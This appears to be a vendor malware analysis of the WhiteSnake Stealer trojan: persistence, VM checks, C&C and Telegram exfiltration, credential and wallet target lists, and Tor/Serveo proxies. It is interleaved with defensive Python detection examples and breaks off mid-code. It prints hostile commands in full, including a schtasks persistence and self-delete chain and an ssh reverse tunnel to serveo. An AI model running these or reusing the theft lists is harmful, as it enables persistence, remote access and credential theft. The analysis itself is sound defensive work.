Packer: .NET Reactor
SHA1 hash:
- 9b75ef8a67b412122e03a8209c5d46ea5a8cd957 (original file name: «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe»)
Description
A trojan application also known as WhiteSnake Stealer. It is written in .NET and targets computers running Microsoft Windows operating systems. Malicious actors use it to steal account data from a variety of software and also to hijack other data. In addition, it allows other apps to be downloaded and run in an infected system.
Operating routine
Verification of execution in virtual machines
Before infecting a target system, the trojan checks the runtime environment to detect whether it was launched in a virtual machine. It does this through the WMI interface, using the Win32_ComputerSystem entity in the \root\CIMV2 namespace. This entity contains information about the computer’s properties and the installed operating system.
In this structure, the fields Model and Manufacturer are verified to see whether the following strings are present in them:
- virtual
- vmbox
- vmware
- thinapp
- VMXh
- innotek gmbh
- tpvcgateway
- tpautoconnsvc
- vbox
- kvm
- red hat
- qemu
The above fields correspond to the following information:
- Model ― the name assigned to the computer by its manufacturer;
- Manufacturer ― the name of the computer manufacturer.
If a virtual machine is detected, the trojan stops working.
Anchoring in the system
The trojan copies itself into the %LOCALAPPDATA%/WindowsSecurity/ directory. Next, it executes a command that looks like this:
cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "<SAMPLE>" /sc MINUTE /tr "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>" /rl HIGHEST /f && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" && START "" "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>"
where SAMPLE is the name of the malware’s previously copied executable file.
This command performs a number of actions that include:
- Changing the console code page to 65001 (UTF-8).
- Pinging the local host (127.0.0.1).
- Creating a scheduled task with the following parameters:
  - tn ― task name;
  - tr ― path to the executable that the task runs;
  - sc ― schedule type ― MINUTE;
  - rl ― launching privileges ― HIGHEST (if the trojan is launched without administrative rights, the LIMITED value is used instead);
  - f ― create the task and suppress the warning if a task with the given name already exists.
- Deleting the current file from which the trojan was executed.
- Running the trojan from %LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>.
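The persistence command above leaves a recognisable pattern in process-creation telemetry (for example the CommandLine field of a Sysmon Event ID 1 record). The following Python is an added example, not code from this description or from the malware: it tokenises a command line, extracts the schtasks switches and reports which traits of the chain are present. The command lines it scans are constructed samples, and the indicator labels are the example's own.

```python
import re

# Constructed process-creation command lines that follow the persistence command
# quoted above; they are made-up samples, not telemetry from a real host.
SAMPLE_EVENTS = [
    r'cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Updater" '
    r'/sc MINUTE /tr "C:\Users\alice\AppData\Local\WindowsSecurity\Updater.exe" '
    r'/rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\alice\Downloads\invoice.exe" '
    r'&& START "" "C:\Users\alice\AppData\Local\WindowsSecurity\Updater.exe"',
    r'schtasks /create /tn "Backup" /sc DAILY /tr "C:\Program Files\Backup\run.exe" /f',
    r'cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "svc" '
    r'/sc MINUTE /tr "C:\Users\bob\AppData\Local\WindowsSecurity\svc.exe" /rl LIMITED /f',
]

# Tokenizer that keeps double-quoted arguments together (cmd.exe style).
TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    return [quoted if quoted else bare for quoted, bare in TOKEN.findall(cmdline)]


def parse_schtasks(cmdline):
    """Return the switches of a schtasks invocation as a dict, or None if there is none.
    Switches that take no value (/create, /f) map to True."""
    toks = tokenize(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if t.lower() in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return None
    params = {}
    i = start + 1
    while i < len(toks) and toks[i] != "&&":          # stop at the next command in the chain
        tok = toks[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            if nxt is not None and nxt != "&&" and not nxt.startswith("/"):
                params[key] = nxt
                i += 2
                continue
            params[key] = True
        i += 1
    return params


def persistence_indicators(cmdline):
    """Return the list of traits of the persistence chain found in this command line."""
    params = parse_schtasks(cmdline)
    if not params or "create" not in params:
        return []
    low = cmdline.lower()
    hits = []
    if str(params.get("sc", "")).upper() == "MINUTE":
        hits.append("task scheduled every minute")
    if re.search(r"\\appdata\\local\\windowssecurity\\", str(params.get("tr", "")), re.I):
        hits.append("task runs from %LOCALAPPDATA%\\WindowsSecurity")
    if "chcp 65001" in low and "ping 127.0.0.1" in low:
        hits.append("chcp 65001 / ping 127.0.0.1 prelude")
    if " del /f /s /q /a " in low and " start " in low:
        hits.append("self-delete followed by relaunch")
    return hits


if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        print(persistence_indicators(cmd) or "clean", "<-", cmd[:60])
```

The second sample (a daily task under Program Files) produces no indicators, while the third, launched without administrative rights (/rl LIMITED), still matches three traits; a rule that keys only on /rl HIGHEST would miss it.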
Distribution
Depending on the configuration, the trojan can spread in the following ways:
- by infecting local user accounts;
- by infecting removable storage devices.
When infecting local user accounts, the trojan accesses the WMI interface, and in the \root\CIMV2 namespace, uses the entity Win32_UserAccount, which contains information about Windows user accounts. With the help of this structure, the trojan obtains the full list of users in the infected system. Next, the malicious program copies itself into the startup directory of every user.
When infecting removable storage devices, the trojan obtains the list of all the drives in the system. If any of the detected drives is removable, the malware copies itself to its root directory.
Collecting system information
The first network packet that the trojan sends to the C&C server after infecting the OS is a packet containing system information and the results obtained by executing tasks. The tasks that the trojan executes will be described in more detail in the corresponding section of the malware description.
Below is an example of the data sent in this packet.
Parameter name (Key) | The contents (Value) | Data-collection method |
---|---|---|
Username | The Windows user name | From the UserName environment variable; spaces are replaced with the _ symbol. |
Compname | The name of the infected computer | From the COMPUTERNAME environment variable; spaces are replaced with the _ symbol. |
OS | The operating system version | From the OSVERSIONINFO structure. |
Tag | res1110myformish | A constant string that represents the trojan’s build identifier. |
IP | The IP address of the infected computer | From the response received after contacting the hxxp://ip-api[.]com/line?fields=query,country service. |
Screen size | Screen resolution in the format <width>x<height> | * |
CPU | Processor name | From the \root\CIMV2 namespace ― Win32_Processor entity ― Name field. |
GPU | Video controller name | From the \root\CIMV2 namespace ― Win32_VideoController entity ― Name field. |
RAM | The amount of RAM, in GB | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― TotalPhysicalMemory field. |
Disk | Disk size, in GB | From the \root\CIMV2 namespace ― Win32_LogicalDisk entity. |
Model | The name given to the computer by its manufacturer | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― Model field. |
Manufacturer | The computer manufacturer’s name | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― Manufacturer field. |
Beacon | Proxy type | A constant string; its value is either serveo or tor. |
Stub version | 1.6.1.3 | A constant that represents the trojan’s build version. |
ExeeD | The path to the currently executed file | * |
Execution timestamp | Current time | * |
Screenshot | A screenshot encoded with base64 | * |
LoadedAssemblies | The list of DLL libraries loaded in the current process | * |
RunningProcesses | The list of running processes | * |
InstalledApplications | The list of installed applications | From the DisplayName values under the SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall registry branch. |
* For fields where the data-collection method is not described, the data is obtained by calling standard C# functions and algorithms.
This packet is an XML form that looks like the following:
<Report xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <files>
    <file filename="" filedata="" filesize="" createdDate="" modifiedDate="" />
    ...
  </files>
  <information>
    <information key=$key_name value=$value />
    <information key=$key_name value=$value />
    ...
  </information>
</Report>
where:
- $key_name and $value ― corresponding fields from the table;
- files ― contains information about crypto-wallet files, session files, logs, and passwords.
The packet to be sent is encrypted with an RSA algorithm. The public encryption key is built into the trojan as an XML form (the RSAKeyValue layout used by .NET) and is shown below:
<RSAKeyValue>
  <Modulus>
    qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==
  </Modulus>
  <Exponent>
    AQAB
  </Exponent>
</RSAKeyValue>
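Two things an analyst does with the structures above are to triage a report once its plaintext is available and to cluster samples by the public key they embed. The following Python is an added example, not code from this description or from the malware: it parses the Report XML layout into key/value pairs and file entries, and decodes the RSAKeyValue form into integers. The report it parses is a constructed sample with made-up values (only the key names come from the table); the RSAKeyValue text is the public key quoted above.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# Constructed plaintext report in the layout described above. The file payload,
# sizes and dates are made up; only the key names come from the table.
SAMPLE_REPORT = """<Report xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <files>
    <file filename="sitemanager.xml" filedata="PGZpbGV6aWxsYS8+" filesize="12" createdDate="2023-01-01" modifiedDate="2023-01-02" />
  </files>
  <information>
    <information key="Tag" value="res1110myformish" />
    <information key="Stub version" value="1.6.1.3" />
    <information key="Beacon" value="tor" />
    <information key="Compname" value="DESKTOP-1" />
  </information>
</Report>"""

# The public key quoted above, copied verbatim (public material only).
RSA_KEY_XML = """<RSAKeyValue>
<Modulus>
qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==
</Modulus>
<Exponent>
AQAB
</Exponent>
</RSAKeyValue>"""


def parse_report(xml_text):
    """Split a plaintext report into its key/value information and its file entries."""
    root = ET.fromstring(xml_text)
    # The container element is also named <information>; only entries carry a key.
    info = {e.get("key"): e.get("value")
            for e in root.iter("information") if e.get("key") is not None}
    files = []
    for f in root.iter("file"):
        data = base64.b64decode(f.get("filedata") or "")
        files.append({
            "filename": f.get("filename"),
            "declared_size": int(f.get("filesize") or 0),
            "actual_size": len(data),            # compare with declared_size during triage
            "sha256": hashlib.sha256(data).hexdigest(),
        })
    return info, files


def parse_rsa_key_value(xml_text):
    """Decode the .NET RSAKeyValue XML into (modulus, exponent) integers."""
    root = ET.fromstring(xml_text)

    def b64int(tag):
        raw = "".join(root.findtext(tag).split())   # drop the whitespace around the value
        return int.from_bytes(base64.b64decode(raw), "big")

    return b64int("Modulus"), b64int("Exponent")


def key_fingerprint(xml_text):
    """SHA-256 over the big-endian modulus bytes: a stable value for grouping samples that embed the same key."""
    n, _ = parse_rsa_key_value(xml_text)
    return hashlib.sha256(n.to_bytes((n.bit_length() + 7) // 8, "big")).hexdigest()


if __name__ == "__main__":
    info, files = parse_report(SAMPLE_REPORT)
    n, e = parse_rsa_key_value(RSA_KEY_XML)
    print(info["Tag"], info["Stub version"], files[0]["filename"], files[0]["actual_size"])
    print(n.bit_length(), "bit modulus, e =", e, "fingerprint", key_fingerprint(RSA_KEY_XML)[:16])
```

The modulus fingerprint is what to pivot on when comparing builds: the Tag and Stub version strings change between builds, whereas a build that still carries the same public key reports to an operator holding the same private key.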
The results from completing tasks are sent both to one of the C&C servers and to a dedicated Telegram chat.
The specifics of transferring data to the C&C server
To select a C&C server IP address, the trojan sends a packet to each address from the available list until the transmission is successful. Below is the list of addresses:
hxxp[:]//213[.]232.255.61:8080
hxxp[:]//88[.]99.71.225:8080
hxxp[:]//51[.]178.53.191:8080
hxxp[:]//78[.]46.66.9:8080
hxxp[:]//135[.]181.206.12:8080
hxxp[:]//217[.]145.238.175:80
hxxps[:]//164[.]90.185.9:443
hxxp[:]//94[.]156.6.209:80
hxxp[:]//104[.]248.253.214:80
hxxp[:]//141[.]94.175.31:8098
hxxp[:]//34[.]207.71.126:80
hxxp[:]//192[.]99.44.107:8080
hxxp[:]//107[.]161.20.142:8080
hxxp[:]//52[.]86.18.77:8080
hxxps[:]//192[.]99.196.191:443
hxxp[:]//216[.]250.190.139:80
hxxp[:]//205[.]185.123.66:8080
hxxp[:]//52[.]26.63.10:9999
hxxp[:]//24[.]199.110.250:8080
hxxp[:]//45[.]55.65.93:80
hxxp[:]//139[.]99.123.53:9191
hxxps[:]//44[.]228.161.50:443
hxxp[:]//162[.]33.178.113:80
hxxp[:]//167[.]71.106.175:80
hxxp[:]//45[.]76.190.214:1024
hxxp[:]//154[.]31.165.232:80
hxxp[:]//168[.]138.211.88:8099
hxxps[:]//52[.]193.176.117:443
hxxps[:]//52[.]196.241.27:443
hxxps[:]//54[.]249.142.23:443
hxxp[:]//121[.]63.250.132:88
The request is generated as follows:
- Transmission method: PUT.
- Route formation: <rand_str>_<username>@<compname>_report.wsr, where:
  - <rand_str> ― a random string with a length of 5 symbols;
  - <username> ― user name;
  - <compname> ― this computer’s name.
- The transfer is carried out as a file upload.
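The address list and the route format above translate directly into a network detection: a PUT to one of the listed endpoints, or a PUT whose path matches <rand_str>_<username>@<compname>_report.wsr regardless of destination. The following Python is an added example, not code from this description or from the malware: it re-fangs a subset of the listed addresses and scans proxy log lines. The log lines are constructed, and their column layout (timestamp, method, destination IP, destination port, path) is the example's own assumption.

```python
import re

# A subset of the C&C addresses listed above, in the defanged form used on the page.
DEFANGED_C2 = [
    "hxxp[:]//213[.]232.255.61:8080",
    "hxxp[:]//88[.]99.71.225:8080",
    "hxxps[:]//164[.]90.185.9:443",
    "hxxp[:]//45[.]76.190.214:1024",
]

# Route pattern from above: <rand_str>_<username>@<compname>_report.wsr
REPORT_PATH = re.compile(r"^/?[A-Za-z0-9]{5}_[^/@\s]+@[^/@\s]+_report\.wsr$")

# Constructed proxy log lines (timestamp, method, destination IP, destination port,
# request path); these are not real captures.
SAMPLE_LOG = """\
2023-08-01T10:00:01Z PUT 213.232.255.61 8080 /k3j2f_alice@DESKTOP-1_report.wsr
2023-08-01T10:00:02Z GET 93.184.216.34 80 /index.html
2023-08-01T10:00:03Z PUT 10.0.0.5 8080 /upload/backup.bin
2023-08-01T10:00:04Z PUT 198.51.100.7 80 /abcde_bob@LAPTOP_report.wsr
"""


def refang(entry):
    """Turn hxxp[:]//1[.]2.3.4:port into (scheme, ip, port)."""
    plain = entry.replace("[:]", ":").replace("[.]", ".")
    plain = re.sub(r"^hxxp", "http", plain)
    m = re.match(r"^(https?)://([\d.]+):(\d+)$", plain)
    if not m:
        raise ValueError(f"unrecognised entry: {entry}")
    return m.group(1), m.group(2), int(m.group(3))


C2_ENDPOINTS = {(ip, port) for _scheme, ip, port in map(refang, DEFANGED_C2)}


def analyze_line(line):
    """Return the reasons a log line looks like a report upload (empty list = none)."""
    _ts, method, ip, port, path = line.split(maxsplit=4)
    reasons = []
    if (ip, int(port)) in C2_ENDPOINTS:
        reasons.append("destination is a listed C&C endpoint")
    if method.upper() == "PUT" and REPORT_PATH.match(path):
        reasons.append("PUT of a <rand>_<user>@<host>_report.wsr file")
    return reasons


def scan(log_text):
    """Return (timestamp, reasons) for every line that matches at least one check."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = analyze_line(line)
        if reasons:
            findings.append((line.split()[0], reasons))
    return findings


if __name__ == "__main__":
    for ts, reasons in scan(SAMPLE_LOG):
        print(ts, "; ".join(reasons))
```

The last sample line goes to an address that is not in the list and is still flagged by the path pattern alone; since the trojan walks its address list until an upload succeeds, the path check is the part of the rule that survives a change of infrastructure.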
The specifics of transferring data to a Telegram chat
The following message is formed:
#res1110myformish #Wallets #Beacon
<b>OS:</b> <i><Operating system></i>
<b>Country:</b> <i><Country></i>
<b>Username:</b> <i><Windows user account name></i>
<b>Compname:</b> <i><Computer name></i>
<b>Report size:</b> <Size of the sent XML>Mb
Telegram’s API is used to send the packet. The main URL that contains the API token:
hxxps[:]//api[.]telegram[.]org/bot660*******:AAHL********_******UfVtaKSR2*******
The following request parameters are added to this URL:
- chat_id=****91**** ― a constant from the malware’s configuration.
- text=hexlify(data) ― contains the text of the message (described above); the data is converted using the hexlify function.
- reply_markup= ― contains a JSON document (shown below), converted with the hexlify function.
- parse_mode=HTML.
The data from the JSON:
{
  "inline_keyboard": [
    [
      {
        "text": "Download",
        "url": "<c2_response>"
      },
      {
        "text": "Open",
        "url": "<url>"
      }
    ]
  ]
}
where:
- <c2_response> ― the C&C server’s response to the sent report;
- <url> ― the hxxp[:]//127[.]0.0.1:18772/handleOpenWSR?r=<c2_response> address.
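A captured Telegram request of this shape can be decoded offline to recover the notification text, the build tag and the button links without contacting the API. The following Python is an added example, not code from this description or from the malware: it builds a request in the described form from constructed values and then decodes it. The bot token, chat id and Download URL are placeholders (the real ones are masked on the page), the sendMessage method name in the path is an assumption of the example, and the message field values are made up.

```python
import binascii
import json
from urllib.parse import parse_qs, urlsplit


def _hexlify(text):
    return binascii.hexlify(text.encode("utf-8")).decode("ascii")


def build_sample_request():
    """Constructed request in the shape described above. PLACEHOLDER_TOKEN and
    PLACEHOLDER_CHAT_ID stand in for the masked values; the Bot API method name
    (sendMessage) and the Download URL are assumptions of this example."""
    message = ("#res1110myformish #Wallets #Beacon\n"
               "<b>OS:</b> <i>Windows 10</i>\n"
               "<b>Country:</b> <i>XX</i>\n"
               "<b>Username:</b> <i>alice</i>\n"
               "<b>Compname:</b> <i>DESKTOP-1</i>\n"
               "<b>Report size:</b> 0.42Mb")
    markup = {"inline_keyboard": [[
        {"text": "Download", "url": "http://C2_PLACEHOLDER/r/REPORT_ID"},
        {"text": "Open", "url": "http://127.0.0.1:18772/handleOpenWSR?r=REPORT_ID"},
    ]]}
    return ("https://api.telegram.org/botPLACEHOLDER_TOKEN/sendMessage"
            "?chat_id=PLACEHOLDER_CHAT_ID"
            f"&text={_hexlify(message)}"
            f"&reply_markup={_hexlify(json.dumps(markup))}"
            "&parse_mode=HTML")


def decode_exfil_request(url):
    """Recover the message, tags, chat id and buttons from a captured request URL."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    text = binascii.unhexlify(query["text"][0]).decode("utf-8", "replace")
    markup = json.loads(binascii.unhexlify(query["reply_markup"][0]))
    path_parts = parts.path.split("/")          # ['', 'bot<token>', '<method>']
    return {
        "bot_token_present": len(path_parts) > 1 and path_parts[1].startswith("bot"),
        "chat_id": query.get("chat_id", [None])[0],
        "tags": [w for w in text.split() if w.startswith("#")],
        "message": text,
        "buttons": {b["text"]: b["url"] for row in markup["inline_keyboard"] for b in row},
    }


if __name__ == "__main__":
    decoded = decode_exfil_request(build_sample_request())
    print(decoded["tags"], decoded["chat_id"])
    print(decoded["message"])
    print(decoded["buttons"])
```

The first hashtag in the decoded text is the build tag (res1110myformish here), the same value sent as Tag in the system-information packet, so the two channels can be tied to one build.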
Tasks executed when collecting information
The trojan has a built-in XML form with a list of data-collection tasks. This form consists of blocks of tasks that are structured as follows:
<command name="0">
  <args>
    <string>...</string>
    ...
  </args>
</command>
where:
- name ― the type of task executed;
- args ― the list of arguments for the task.
Collected data
Collecting data using regular expressions ― data is collected from the listed directories using the listed patterns (where a directory has several patterns, they are separated by commas):
Path to the directory | Regular expressions |
---|---|
%AppData%\Authy Desktop\Local Storage\leveldb | * |
%AppData%\dolphin_anty | db.json |
%USERPROFILE%\OpenVPN\config | *\*.ovpn |
%AppData%\WinAuth | *.xml |
%AppData%\obs-studio\basic\profiles | *\service.json |
%AppData%\FileZilla | sitemanager.xml, recentservers.xml |
%LocalAppData%\AzireVPN | token.txt |
%USERPROFILE%\snowflake-ssh | session-store.json |
%ProgramFiles(x86)%\Steam | ssfn*, config\*.vdf |
%Appdata%\Discord\Local Storage\leveldb | *.l?? |
%AppData%\The Bat! | ACCOUNT.??? |
%SystemDrive% | Account.rec0 |
%AppData%\Signal | config.json, sql\db.sqlite |
%AppData%\Session | config.json, sql\db.sqlite |
%AppData%\tox | *.db, *.tox, *.ini, *.json, *.hstr |
%AppData%\.purple | accounts.xml |
%AppData%\ledger live | app.json |
%AppData%\atomic\Local Storage\leveldb | *.l?? |
%AppData%\WalletWasabi\Client\Wallets | *.json |
%AppData%\Binance | *.json |
%AppData%\Guarda\Local Storage\leveldb | *.l?? |
%LocalAppData%\Coinomi\Coinomi\wallets | *.wallet |
%AppData%\Bitcoin\wallets | *\*wallet* |
%AppData%\Electrum\wallets | * |
%AppData%\Electrum-LTC\wallets | * |
%AppData%\Zcash | *wallet*dat |
%AppData%\Exodus | exodus.conf.json, exodus.wallet\*.seco |
%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb | .l?? |
%AppData%\Jaxx\Local Storage\leveldb | .l?? |
%UserProfile%\Documents\Monero\wallets | *\* |
%AppData%\MyMonero | FundsRequests*, PasswordMeta*, Wallets* |
%UserProfile%\Desktop | *.txt, *.doc*, *.xls*, *.kbd*, *.pdf |
%UserProfile%\Downloads | *.txt, *.doc*, *.xls*, *.kbd*, *.pdf |
%AppData%\Telegram Desktop\tdata | *s;????????????????\*s |
Collecting user profiles ― all data is copied from the following directories:
- %AppData%\Google\Chrome\Profiles
- %AppData%\Yandex\YandexBrowser\Profiles
- %AppData%\Vivaldi\Profiles
- %AppData%\CocCoc\Browser\Profiles
- %AppData%\CentBrowser\Profiles
- %AppData%\BraveSoftware\Brave-Browser\Profiles
- %AppData%\Chromium\Profiles
- %AppData%\Microsoft\Edge\Profiles
- %AppData%\Opera Software\Opera Stable
- %AppData%\Opera Software\Opera GX Stable
- %Appdata%\Discord
- %LocalAppdata%\Mozilla\Firefox\Profiles
- %LocalAppdata%\Thunderbird\Profiles
Collecting data about crypto wallets ― the list of crypto wallets that malicious actors are interested in:
The name of the crypto wallet | The ID of the corresponding browser plugin |
---|---|
Metamask | nkbihfbeogaeaoehlefnkodbefgpgknn |
Ronin | fnjhmkhhmkbjkkabndcnnogagogbneec |
BinanceChain | fhbohimaelbohpjbbldcngcnapndodjp |
TronLink | ibnejdfjmmkpcnlpebklmnkoeoihofec |
Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa |
Collecting data from the Windows registry:
Registry key | Collected values |
---|---|
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\* | HostName, UserName, Password |
SOFTWARE\FTPWare\CoreFTP\Sites\* | Host, Port, User, PW |
SOFTWARE\Windscribe\Windscribe2 | userId, authHash |
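The directory/pattern pairs above are glob patterns evaluated relative to each directory, which is what a file-access monitoring rule or an impact assessment after an infection needs to reproduce. The following Python is an added example, not code from this description or from the malware: it resolves the %VAR% directories, matches candidate paths with the same wildcard semantics (fnmatch, so * also spans subdirectory separators) and reports which table entry would pick each file up. The watchlist is a transcribed subset of the table, and the environment values and file paths are constructed.

```python
import fnmatch
import re

# Directory/pattern pairs transcribed from the tables above (a subset), in the
# page's own notation.
WATCHLIST = [
    (r"%AppData%\FileZilla", ["sitemanager.xml", "recentservers.xml"]),
    (r"%USERPROFILE%\OpenVPN\config", [r"*\*.ovpn"]),
    (r"%AppData%\The Bat!", ["ACCOUNT.???"]),
    (r"%Appdata%\Discord\Local Storage\leveldb", ["*.l??"]),
    (r"%AppData%\Exodus", ["exodus.conf.json", r"exodus.wallet\*.seco"]),
    (r"%UserProfile%\Desktop", ["*.txt", "*.doc*", "*.xls*", "*.kbd*", "*.pdf"]),
]

# Constructed environment, not read from a real host.
ENV = {
    "appdata": r"C:\Users\alice\AppData\Roaming",
    "localappdata": r"C:\Users\alice\AppData\Local",
    "userprofile": r"C:\Users\alice",
}

# Constructed file paths to classify.
SAMPLE_PATHS = [
    r"C:\Users\alice\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\alice\OpenVPN\config\work\office.ovpn",
    r"C:\Users\alice\OpenVPN\config\office.ovpn",
    r"C:\Users\alice\AppData\Roaming\The Bat!\ACCOUNT.CFN",
    r"C:\Users\alice\AppData\Roaming\Discord\Local Storage\leveldb\000003.ldb",
    r"C:\Users\alice\Desktop\notes.txt",
    r"C:\Users\alice\Desktop\photo.png",
]


def expand(path):
    """Resolve %VAR% references case-insensitively against ENV; unknown names stay as written."""
    return re.sub(r"%([^%]+)%", lambda m: ENV.get(m.group(1).lower(), m.group(0)), path)


def classify(full_path):
    """Return the (directory, pattern) pair that would collect this file, or None."""
    low = full_path.lower()
    for base, patterns in WATCHLIST:
        root = expand(base).lower().rstrip("\\") + "\\"
        if not low.startswith(root):
            continue
        rel = low[len(root):]                      # path relative to the watched directory
        for pat in patterns:
            # Windows paths are case-insensitive, so both sides are lowered first.
            if fnmatch.fnmatchcase(rel, pat.lower()):
                return base, pat
    return None


def watchlist_hits(paths):
    """Map each path that would be collected to the table entry responsible."""
    return {p: classify(p) for p in paths if classify(p) is not None}


if __name__ == "__main__":
    for path, hit in watchlist_hits(SAMPLE_PATHS).items():
        print(path, "->", hit)
```

Note the OpenVPN entry: its pattern *\*.ovpn requires at least one subdirectory level, so a profile stored directly in the config directory is not matched, while one in any nested folder is.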
Keylogger registration
The initial keylogger registration is performed when the trojan starts. Its further interaction with the keylogger is carried out through commands received from the C&C server. Keystroke data is saved to the malware’s memory.
Command execution
Before the trojan begins executing commands, it installs a proxy server. The malware’s configuration has a field that is responsible for the proxy type:
- serveo ― a proxy using the SSH protocol and a Serveo service;
- tor ― a proxy using the Tor network.
The information about the type of proxy used is sent to the C&C server in the first packet with the system information and is located in the Beacon field.
A proxy server based on the Tor protocol
The trojan verifies whether the Tor application was previously downloaded by checking whether the %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe file exists. If the program does not exist, the trojan downloads it from the link hxxps[:]//github[.]com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip.
Next, it creates a %LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt configuration file for Tor as follows:
SOCKSPort <port> + 1
ControlPort <port> + 2
DataDirectory %LOCALAPPDATA%/9hyfy7lwm1/tor/data
HiddenServiceDir %LOCALAPPDATA%/9hyfy7lwm1/tor/host
HiddenServicePort 80 127.0.0.1:<port>
HiddenServiceVersion 3
where <port> is the number of the local port that the trojan opens for Tor: the hidden service forwards its virtual port 80 to 127.0.0.1:<port>, while the SOCKS and control ports are <port> + 1 and <port> + 2.
Lastly, the trojan launches the app with the command %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe -f '%LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt'.
A proxy server based on the SSH protocol and a Serveo service
The trojan verifies whether the OpenSSH tool was downloaded earlier by checking for the SOFTWARE\OpenSSH Windows registry key. If such a key does not exist, the trojan downloads a ZIP archive containing the program from the link hxxps[:]//github[.]com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip and places it into %TEMP%/ssh-000.zip.
Next, it unpacks the archive and launches OpenSSH with the following command:
ssh.exe -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:1233 serveo[.]net
where:
- -o ― launch options (here, StrictHostKeyChecking=no disables host-key verification);
- -R ― the remote port-forwarding specification: port 80 on the Serveo side is forwarded to 127.0.0.1:1233 on the infected computer; serveo[.]net is the Serveo service address.
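Both proxy variants above expose a local listener to the outside: the Tor hidden service through its HiddenServicePort mapping, and the Serveo variant through the ssh -R reverse forward. The following Python is an added example, not code from this description or from the malware: it parses a torrc in the layout shown and an ssh command line in the form quoted, and reports which local ports become reachable. The torrc text and its port numbers are constructed (the page does not give the value of <port>), and the user profile path in it is made up; the ssh command line is the one quoted above in plain form.

```python
# Constructed torrc in the layout described above; the port numbers and the
# profile path are made up.
SAMPLE_TORRC = """\
SOCKSPort 41001
ControlPort 41002
DataDirectory C:\\Users\\alice\\AppData\\Local\\9hyfy7lwm1\\tor\\data
HiddenServiceDir C:\\Users\\alice\\AppData\\Local\\9hyfy7lwm1\\tor\\host
HiddenServicePort 80 127.0.0.1:41000
HiddenServiceVersion 3
"""

# The ssh command line quoted above, in plain (non-defanged) form.
SAMPLE_SSH_CMDLINE = 'ssh.exe -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:1233 serveo.net'


def parse_torrc(text):
    """Collect the directives that determine what the Tor instance exposes."""
    cfg = {"hidden_services": []}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key in ("socksport", "controlport"):
            cfg[key] = int(value)
        elif key == "hiddenservicedir":
            cfg["hiddenservicedir"] = value
        elif key == "hiddenserviceport":
            # "<virtual port> <host>:<port>": the virtual port is what .onion clients
            # connect to; the target is the local listener it is forwarded to.
            virtual, _, target = value.partition(" ")
            host, _, port = target.rpartition(":")
            cfg["hidden_services"].append(
                {"virtual_port": int(virtual), "target": (host, int(port))})
    return cfg


def parse_ssh_reverse_forwards(cmdline):
    """Return the -R specs of an ssh command line and the server it connects to."""
    toks = cmdline.split()
    specs = []
    for i, tok in enumerate(toks):
        if tok == "-R" and i + 1 < len(toks):
            spec = toks[i + 1]
        elif tok.startswith("-R") and len(tok) > 2:  # "-R80:127.0.0.1:1233" form
            spec = tok[2:]
        else:
            continue
        parts = spec.split(":")
        if len(parts) == 3:                          # remote_port:local_host:local_port
            specs.append({"remote_port": int(parts[0]),
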